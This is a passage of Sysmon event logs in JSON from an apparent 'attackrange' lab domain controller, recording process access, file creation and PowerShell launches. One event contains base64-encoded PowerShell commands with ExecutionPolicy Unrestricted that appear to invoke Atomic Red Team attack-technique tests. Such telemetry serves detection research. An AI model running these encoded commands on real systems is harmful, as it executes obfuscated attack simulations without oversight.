06:55:15.306","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5395,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.306\r\nSourceProcessGUID: {E2A3D6B1-11D2-5F25-0000-001089BB0700}\r\nSourceProcessId: 2892\r\nSourceThreadId: 3144\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-00107FE20700}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.306","SourceProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001089BB0700}","SourceProcessId":"2892","SourceThreadId":"3144","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-00107FE20700}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5396,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:15.306\r\nProcessGuid: {E2A3D6B1-11D3-5F25-0000-001090DE0700}\r\nProcessId: 4108\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\u3qddcyv.dll\r\nCreationUtcTime: 2020-08-01 06:55:15.212","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:15.306","ProcessGuid":"{E2A3D6B1-11D3-5F25-0000-001090DE0700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\u3qddcyv.dll","CreationUtcTime":"2020-08-01 06:55:15.212","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5397,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.353\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.353","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5398,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.353\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.353","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5399,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.353\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.353","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5400,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.525\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.525","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5401,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.548\r\nProcessGuid: {E2A3D6B1-11D3-5F25-0000-001046E60700}\r\nProcessId: 4780\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D2-5F25-0000-0020BBBA0700}\r\nLogonId: 0x7BABB\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-11D2-5F25-0000-00101DCB0700}\r\nParentProcessId: 4984\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.548","ProcessGuid":"{E2A3D6B1-11D3-5F25-0000-001046E60700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D2-5F25-0000-0020BBBA0700}","LogonId":"0x7babb","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-11D2-5F25-0000-00101DCB0700}","ParentProcessId":"4984","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 